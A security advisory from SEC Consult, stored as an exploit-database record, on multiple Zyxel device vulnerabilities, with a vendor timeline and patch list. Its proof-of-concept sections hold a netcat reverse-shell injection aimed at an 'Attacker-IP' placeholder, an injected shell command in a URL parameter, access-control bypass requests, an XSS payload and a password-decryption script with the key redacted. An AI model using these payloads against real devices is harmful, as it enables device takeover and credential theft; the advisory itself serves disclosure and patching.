Multiple Zyxel devices suffer from buffer overflow, local file disclosure, unsafe storage of sensitive data, command injection, broken access control, symbolic link processing, cross site request forgery, and cross site scripting vulnerabilities.
{"id": "1337DAY-ID-37368", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Zyxel Buffer Overflow / File Disclosure / CSRF / XSS / Broken Access Control Vulnerabilities", "description": "Multiple Zyxel devices suffer from buffer overflow, local file disclosure, unsafe storage of sensitive data, command injection, broken access control, symbolic link processing, cross site request forgery, and cross site scripting vulnerabilities.", "published": "2022-02-17T00:00:00", "modified": "2022-02-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/37368", "reporter": "Stefan Viehbock", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2023-03-14T00:52:50", "viewCount": 212, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "vulnersScore": 0.0}, "_state": {"dependencies": 1678755196, "score": 1678755234, "epss": 1679178262}, "_internal": {"score_hash": "ab8fb6e8e59faf77d7b8f30992fea648"}, "sourceHref": "https://0day.today/exploit/37368", "sourceData": "=======================================================================\n title: Multiple Critical Vulnerabilities\n product: Multiple Zyxel devices\n vulnerable version: For affected products see \"Solution\" section\n fixed version: see \"Solution\" section\n CVE number: -\n impact: Critical\n homepage: https://www.zyxel.com\n found: 2020-11-27\n by: G. Hechenberger (Office Vienna)\n S. Robertz (Office Vienna)\n S. Viehb\u00f6ck (Office Vienna)\n T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\n\"Focused on innovation and customer-centricity, Zyxel Communications Corp. has\nbeen connecting people to the internet for nearly 30 years. 
We keep promoting\ncreativity which meets the needs of customers. This spirit has never been\nchanged since we developed the world's first integrated 3-in-1 data/fax/voice\nmodem in 1992. Our ability to adapt and innovate with networking technology\nplaces us at the forefront of understanding connectivity for telco/service\nproviders, businesses and home users.\n\nWe're building the networks of tomorrow, helping unlock the world's potential\nand meeting the needs of the modern workplace; powering people at work, life\nand play. We stand side-by-side with our customers and partners to share new\napproaches to networking that will unleash their abilities. Loyal friend,\npowerful ally, reliable resource \u2014 we are Zyxel, Your Networking Ally.\"\n\nSource: https://www.zyxel.com/about_zyxel/company_overview.shtml\n\n\nBusiness recommendation:\n------------------------\nSEC Consult recommends Zyxel customers to upgrade the firmware to the latest\nversion available.\n\nThe collaboration between Zyxel Communications and SEC Consult will further strengthen\nZyxel's cybersecurity strategy by accelerating and optimizing the ability to respond\nto threats and vulnerabilities like those described in this advisory.\n\nhttps://sec-consult.com/blog/detail/zyxel-communications-and-sec-consult-reach-next-level-of-cybersecurity/\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so\nMultiple unauthenticated buffer overflows have been discovered in the zhttpd web\nserver. One buffer overflow is extremely simple to trigger as it occurs in the\nURI input. In case of an overlong input, the web server crashes as the return\naddress is overwritten with the input values as the function scanf() without\nlength check was used. Multiple other buffer overflows can be found in the fol-\nlowing functionalities:\n* URI parsing in libclinkc.so, if '?' 
is contained.\n* Export_Log functionality.\n\nAn attacker can take over the device by using the return-to-zero-protection\ntechnique as ASLR in the used Linux kernel is activated system-wide and the NX\nbit is set for the web server binary. Other protection mechanisms like PIE,\nstack canaries and relocation read only were not set. The address of libc\nshifts due to ASLR and must be brute-forced therefore. This can take up to one\nhour. However, on average, an attacker will gain a root shell in less than\n30 minutes.\n\n\n2) Unauthenticated Local File Disclosure in zhttpd\nAn endpoint in zhttpd can be used to expose system files including\n\"/etc/passwd\" and \"/etc/shadow\". This endpoint is accessible without prior\nlogin. An attacker can read all files on the system by using this endpoint.\n\n\n3) Unsafe Storage of Sensitive Data\nThe device configuration contains passwords stored in a reversible form. Rather\nthan storing passwords in an appropriate cryptographic hash format, the\npasswords are encrypted with a symmetric cipher (AES) using a static key. An\nattacker with access to the device configuration (e.g. by exploiting vulnerability\n #2) can decrypt the passwords and use them in further attacks.\n\n\n4) Authenticated Command Injection\nTwo command injections were found within the device. One was identified in the\nping diagnostic tool, the other one at the certificate upload. Both led to a\nfully compromised system as the web service was started with root permissions.\n\nIt is suspected that more command injections are present in the web interface\nof the device.\n\n\n5) Broken Access Control\nVarious access control vulnerabilities were identified where a lower privileged\nuser can access functionality of a higher privilege role.\nSome functionality is visible in the GUI only if using a user account with full\naccess permissions. However, it is not visible as standard \"admin\" user with the\nrole administrator. 
It can be exploited, e.g., to open ports for system services\nsuch as SSH and FTP and also to access other functionality intended to be used\nby users with full access only.\n\n\n6) Processing of Symbolic Links in ftpd\nThe FTP server on the device processes symbolic links on external storage\nmedia, e.g. formatted as NTFS. By creating a symbolic link to the root directory,\nthis can be abused to get read access to the root file system.\n\n\n7) Inadequate CSRF Implementation\nThe web interface provides CSRF tokens, which are implemented as 9-digit\nnumbers and are transmitted as \"sessionkey\" parameter. CSRF tokens rely on\nunpredictability to fulfill their function. However, an API endpoint exists on\nthe device, which can be used in an unauthenticated manner to generate and\nretrieve a new and valid CSRF token value over the internal network.\n\n\n8) Stored Cross-Site Scripting\nA stored cross-site scripting vulnerability was identified in the printer name\nfield of the print server menu within the web interface of the device. However,\nthe possible payload is limited to 32 characters and certain tags.\n\n\nProof of concept:\n-----------------\n1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so\n\nURI parsing pseudo code in zhttpd:\n-------------------------------------------------------------------------------\nchar path [256];\n[...]\n__s = (char *)cg_http_request_geturi(param_1);\npcVar2 = strstr(__s,\"Export_Log\");\nif (pcVar2 != (char *)0x0) {\n__isoc99_sscanf(__s,\"%*[^?]?%s\",path);\nreturn;\n}\n-------------------------------------------------------------------------------\nThis code will copy everything following a '?' from the URI to a 256 byte\nbuffer. 
As URIs are commonly allowed to contain 2048 characters, the 'path'\nbuffer can be overflown.\n\nProof of concept exploit that will obtain a root shell:\n-------------------------------------------------------------------------------\n< the remote root exploit has been removed from this advisory and will be\n published at a later date >\n-------------------------------------------------------------------------------\n\nURI handling pseudo code, when '?' is present, in libclinkc.so, which is called\nfrom zhttpd:\n-------------------------------------------------------------------------------\nchar acStack144 [128];\npcVar2 = strchr(uri_ptr,'?');\nif (pcVar2 != (char *)0x0) {\nmemset(acStack144,0,0x80);\nstrncpy(acStack144,uri_ptr,(size_t)(pcVar2 + -(int)uri_ptr));\n-------------------------------------------------------------------------------\nThis buffer can be overflown even though strncpy is used, as the copy length\nparameter 'n' is user controlled. The attacker will need to request a URL with\nmore than 128 characters and will then append a '?'.\n\n\n2) Unauthenticated Local File Disclosure in zhttpd\nThe endpoint \"Export_Log\" can be used to fetch arbitrary files as shown in the\nfollowing request that accesses the config file \"/data/zcfg_config.json\":\n-------------------------------------------------------------------------------\n< POC removed from this advisory >\n-------------------------------------------------------------------------------\n\nThis endpoint is accessible without prior authentication!\n\nThe file '/data/zcfg_config.json' will contain the running configuration of the\nrouter, including all passwords such as SIP credentials!\n\n\n3) Unsafe Storage of Sensitive Data\nThere is a proprietary password format by Zyxel denoted by the prefix\n\"_encrypt_\". This is implemented by the function encryptPassword in the binary\n\"/bin/zcmd\". 
Values in the configuration fields named \"Privilege\", \"Password\",\n\"DefaultPassword\" and \"OldDefaultPassword\" are passed to a function that\nderives an AES key using the OpenSSL function EVP_BytesToKey from static data.\nThe following code snippets are a re-implementation of the key derivation\nalgorithm. The key has been removed from this advisory.\n-------------------------------------------------------------------------------\n#include <stdio.h>\n#include <string.h>\n#include <openssl/evp.h>\n\n/* static salt and passphrase (redacted in this advisory) */\nunsigned char salt[] = { 0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX };\nint encrypt_key_length;\nchar encryptKey[]= \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";\nencrypt_key_length = strlen(encryptKey);\nunsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];\nint datal = encrypt_key_length;\n/* EVP_BytesToKey returns the derived key length (32 bytes for AES-256) */\nint key_len = EVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), (const unsigned char*)salt,\n(const unsigned char*)encryptKey, datal,5,key,iv);\n/* print only the derived bytes, not the whole EVP_MAX_* buffers */\nfor (int i = 0;i < key_len;i++) {\nprintf(\"%02X\", key[i]);\n}\nprintf(\"\\n\");\nfor (int i = 0;i < EVP_CIPHER_iv_length(EVP_aes_256_cbc());i++) {\nprintf(\"%02X\", iv[i]);\n}\nprintf(\"\\n\");\n-------------------------------------------------------------------------------\nThe input for the key derivation is static, so the resulting key and IV are\ntoo. 
Based on this information the following Python snippet was developed that\ndecrypts password entries (the key has been removed from this advisory):\n-------------------------------------------------------------------------------\nfrom base64 import b64decode\nfrom Crypto.Cipher import AES  # PyCryptodome\n\ndef decrypt_zyxel_encrypt(input):\n    # static AES-256 key and IV derived via EVP_BytesToKey (redacted here)\n    key=bytearray.fromhex(\n    'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n    iv=bytearray.fromhex('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n    # strip the proprietary prefix, base64-decode, then AES-CBC decrypt\n    input=input.replace('_encrypt_','')\n    decoded = b64decode(input)\n    aes = AES.new(key, AES.MODE_CBC,iv)\n    decrypted=aes.decrypt(decoded)\n    print(repr(decrypted))\n-------------------------------------------------------------------------------\nDecrypting the password can be done with the following command:\n >> decrypt_zyxel_encrypt('_encrypt_xxxxxxxxxxxxxxxxx==')\n\nThe same password algorithm was discussed in the context of security research\non the Zyxel VMG8825-T50 before:\nhttps://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/\n\n\n4) Authenticated Command Injection\nThe input vulnerable to command injection can be found in the menu at\nMENU->Maintenance->Diagnostic. The following payload can now be used in the IP\naddress field to create a reverse shell:\n127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attacker-IP Attacker-Port >/tmp/f &\n\nThe second identified possibility for a command injection was the certificate\nupload. 
The endpoint is not visible from the UI for a regular user, however\ndue to the broken access control, see 5), every user can interact with it.\n\n-------------------------------------------------------------------------------\nPOST /cgi-bin/Certificates?action=import_local&priv=;touch${IFS}foo&sessionkey=409106100 HTTP/1.1\nHost: <IP>\nConnection: close\nContent-Length: 1498\nContent-Type: multipart/form-data; boundary=----\nWebKitFormBoundarywlxAsQZ1maK9V9E9\nAccept: */*\nOrigin: https://<IP>\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://<IP>/Certificates\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: Session=uUgQobZKw5cUzesePtCAGhyxH3SOCE8W\n------WebKitFormBoundarywlxAsQZ1maK9V9E9\nContent-Disposition: form-data; name=\"certImportFileName\";\nfilename=\"ZyXELcert.crt\"\nContent-Type: application/pkix-cert\n-----BEGIN CERTIFICATE-----\n[...]\n-----END CERTIFICATE-----\n------WebKitFormBoundarywlxAsQZ1maK9V9E9--\n-------------------------------------------------------------------------------\n\n5) Broken Access Control\n\nAs a first example, available user accounts and their privileges can be viewed\nby sending a request to the following API endpoint:\nhttps://<IP>/cgi-bin/DAL?oid=login_privilege\nThe response shows usernames invisible in the GUI, here e.g., the \"root\" user.\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nContent-Length: 2906\nDate: Thu, 01 Jan 1970 22:59:49 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n{\n\"result\": \"ZCFG_SUCCESS\",\n\"ReplyMsg\": \"Page\",\n\"ReplyMsgMultiLang\": \"\",\n\"Object\": [\n{\n\"Index0\": 1,\n\"Index1\": 1,\n\"Enabled\": true,\n\"Username\": \"root\",\n\"Password\": \"\",\n\"EnableQuickStart\": true,\n\"Privilege\": 
\"login\"\n},\n[...]\n-------------------------------------------------------------------------------\nAs a second example, the status of system services can be viewed by sending a\nrequest to the following API endpoint:\nhttps://<IP>/cgi-bin/DAL?oid=mgmt_srv\nThe response shows various system services, here e.g., the SSH service which\nis only open for a trusted domain (\"Trust_Dm\").\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nContent-Length: 1271\nDate: Thu, 01 Jan 1970 02:18:28 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n{\n\"result\": \"ZCFG_SUCCESS\",\n\"ReplyMsg\": \"RestartDeamon\",\n\"ReplyMsgMultiLang\": \"\",\n\"Object\": [\n[...]\n{\n\"Index\": 5,\n\"Name\": \"SSH\",\n\"Port\": 22,\n\"Mode\": \"Trust_Dm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,\"\n},\n[...]\n-------------------------------------------------------------------------------\nSubsequently, services can also be opened. An example request to open the FTP,\nSSH and SNMP ports is given below. 
The request has to be sent in context of an\n\"admin\" user and has to contain a valid \"sessionkey\" value.\n-------------------------------------------------------------------------------\nPUT /cgi-bin/DAL?oid=mgmt_srv&sessionkey=575595380 HTTP/1.1\nHost: <IP>\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nIf-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT\nX-Requested-With: XMLHttpRequest\nContent-Length: 2097\nOrigin: https://<IP>\nConnection: close\nReferer: https://<IP>/RemoteManagement\nCookie: Session=6snfyaikMK5FmMcerni8cJEnzl4IgaFc\n[\n{\n\"Index\": 1,\n\"Name\": \"HTTP\",\n\"Port\": 80,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 2,\n\"Name\": \"HTTPS\",\n\"Port\": 443,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 3,\n\"Name\": \"FTP\",\n\"Port\": 21,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 4,\n\"Name\": \"TELNET\",\n\"Port\": 23,\n\"Mode\": \"\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": 
true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 5,\n\"Name\": \"SSH\",\n\"Port\": 22,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 6,\n\"Name\": \"SNMP\",\n\"Port\": 161,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 7,\n\"Name\": \"PING\",\n\"Port\": -1,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false,\n\"origport\": 443,\n\"otherorigport\": 80,\n\"httpport\": 80,\n\"httpsport\": 443\n}\n]\n-------------------------------------------------------------------------------\nThe response will indicate success and the system will be restarted. Another\nrequest to the API endpoint used before to query the service status will list\nthe changed SSH mode, now shown as \"LAN_TstDm\".\n\n\n6) Processing of Symbolic Links in ftpd\nA prepared USB stick, formatted as NTFS and containing a link to the root file\nsystem (created by executing \"ln -s / sysroot\") is needed to exploit this vul-\nnerability.\n\nAfter placing the USB stick in the USB port of the device, it is automatically\nmounted to the admin user's home directory. 
By using the access control vulnerability,\ndescribed in 5), the FTP port can be opened to allow FTP access via\nthe internal network.\n\nAfter connecting to the FTP service using the \"admin\" credentials, the mounted\nUSB stick can be accessed and the \"sysroot\" symbolic link will show the\ncontent of the root file system.\n\n\n7) Inadequate CSRF Implementation\nThe following API endpoint can be used without authentication to retrieve a\nnew CSRF token:\nhttps://<IP>/changeSessionKey\nThe response contains the new session key, valid for all user accounts. The\ncurrent one will be invalidated.\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 43\nDate: Thu, 01 Jan 1970 12:29:50 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n[\n{\n\"SessionKey\": 583723980\n}\n]\n-------------------------------------------------------------------------------\n\n8) Stored Cross-Site Scripting\nBy browsing to \"MENU->Network Setting->USB Service->Print Server\", the field\n\"User Defined Printer Name\" can be used to place a stored cross-site scripting\npayload. 
The following code was used as proof-of-concept:\n\nP<img src=x onerror=alert('XSS')>\n\nIn a PUT request, this action looks like the following listing in the proxy:\n-------------------------------------------------------------------------------\nPUT /cgi-bin/DAL?oid=print_server&sessionkey=578218320 HTTP/1.1\nHost: <IP>\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nIf-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT\nX-Requested-With: XMLHttpRequest\nContent-Length: 106\nOrigin: <IP>\nConnection: close\nCookie: activeMenuID=maintain_settings; activeSubmenuID=log;\nSession=Fg2kSHIfZW5mhySEY4vJfrElXE4TSLEl\n{\n\"Enable\":false,\n\"IppMake\":\"PRINTER\",\n\"IppDevice\":\"/dev/printer0\",\n\"IppName\":\"P<img src=x onerror=alert('XSS')>\"\n}\n-------------------------------------------------------------------------------\nThe printer name will be stored and displayed on the same page, executing the\npayload.\n\n\nVulnerable / tested versions:\n-----------------------------\nMultiple devices are affected. See section \"solution\" for the list of affected models\nprovided by the vendor including the patched firmware version. All firmware older than\nthose listed are affected.\n\n\nVendor contact timeline:\n------------------------\n2021-01-21 | Contacting vendor via [email\u00a0protected] Received confirmation\n from Zyxel employee.\n2021-02-09 | Zyxel confirms vulnerabilities and is working on a fix. Zyxel asks\n for more time; extended advisory disclosure date to 2021-05-20.\n2021-04-09 | Asked for an update.\n2021-04-13 | Zyxel stated that updates on the issues will be provided soon.\n2021-04-28 | Phone call with Zyxel. 
Zyxel contact stated that all issues were\n resolved.\n2021-05-01 | Zyxel stated that a status update will follow in the next weeks.\n2021-05-19 | Zyxel PSIRT sent a list with feedback to all discovered issues.\n2021-06-01 | Zyxel PSIRT updated the list and added a patch plan including timing.\n The earliest updates on the security issues were scheduled\n for Q3 2021.\n2021-09-02 | Status meeting with Zyxel. The advisory disclosure shifts back to\n Q4 2021 due to more affected products.\n2021-11-07 | Security advisory disclosure plan discussion with Zyxel. Vendor stated\n that more products must be internally reviewed. The advisory can be released\n in Q1 2022 if no further devices are affected.\n2022-01-25 | Asking vendor regarding coordinated advisory release date.\n2022-02-03 | Asking vendor again for a status update.\n2022-02-07 | Vendor replies that affected models are still being consolidated.\n2022-02-10 | Received final list of affected models.\n2022-02-15 | Zyxel publishes their security advisory.\n2022-02-15 | Coordinated release of security advisory.\n\n\nSolution:\n---------\nInstall the current version of the firmware for the affected product. According to the\nvendor, the following firmware versions fix the identified security issues:\n\nAffected EOL products (list not necessarily complete) which will not get an update:\n\nAMG1302-T11C EOL\nVMG3925-B10C EOL\nVMG8924-B10D EOL\nVMG1312-B10D EOL\nVMG3312-T20A EOL\nVMG3625-T20A EOL\nVMG3925-B10B EOL\nVMG3925-B10C EOL\nVMG3925-B30C EOL\nVMG3926-B10A EOL\nVMG5313-B10B EOL\nVMG5313-B30B EOL\nVMG8623-T50A EOL\nVMG8823-B10B EOL\nVMG8823-B30B EOL\nVMG8823-B50B EOL\nVMG8823-B60B EOL\nVMG8924-B10D EOL\nVMG8924-B30D EOL\nPMG5317-T20A EOL\n\n\nAffected product Model / Patch availability\nCPE:\nDX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*\nDX5401-B0 V5.17(ABYO.1)C0*\nEMG3525-T50B EMEA - V5.50(ABPM.6)C0*\n S. America - V5.50(ABSL.0)b12 in Sep. 2022*\nEMG5523-T50B EMEA - V5.50(ABPM.6)C0*\n S. 
America - V5.50(ABSL.0)b12 in Sep. 2022*\nEMG5723-T50K V5.50(ABOM.7)C0*\nEX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*\nEX5401-B0 V5.17(ABYO.1)C0*\nEX5501-B0 V5.17(ABRY.2)C0*\nLTE3301-PLUS V1.00(ABQU.3)C0*\nLTE7240-M403 V2.00(ABMG.4)C0*\nVMG1312-T20B V5.50(ABSB.5)C0*\nVMG3625-T50B V5.50(ABPM.6)C0*\nVMG3927-B50A V5.17(ABMT.6)C0*\nVMG3927-B60A V5.17(ABMT.6)C0*\nVMG3927-T50K V5.50(ABOM.7)C0*\nVMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*\nVMG8623-T50B V5.50(ABPM.6)C0*\nVMG8825-B50A V5.17(ABMT.6)C0*\nVMG8825-B50B V5.17(ABNY.7)C0*\nVMG8825-B60A V5.17(ABMT.6)C0*\nVMG8825-B60B V5.17(ABNY.7)C0*\nVMG8825-T50K V5.50(ABOM.7)C0*\nXMG3927-B50A V5.17(ABMT.6)C0*\nXMG8825-B50A V5.17(ABMT.6)C0*\n\nFirewall:\nVPN2S V1.20(ABLN.2)_00210319C1*\n\nONT:\nAX7501-B0 V5.17(ABPC.1)C0*\nEP240P V5.40(ABVH.1)C0 in May 2022*\nPMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*\nPMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*\nPMG5622GA V5.40(ABNB.2)C0 in Apr. 2022*\n\nWiFi extender:\nWX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*\nWX3401-B0 V5.17(ABVE.1)C0*\n\nWiFi system:\nWSQ50 (Multy X) V2.20(ABKJ.7)C0\nWSQ60 (Multy Plus) V2.20(ABND.8)C0\n\n*Please reach out to your local Zyxel support team for the updated firmware file.\n\n\nFor further information, please see the vendor's advisory as well:\nhttps://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities.shtml\n\nPage from the vendor regarding affected devices:\nhttps://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities_Products.shtml\n", "category": "web applications", "verified": true}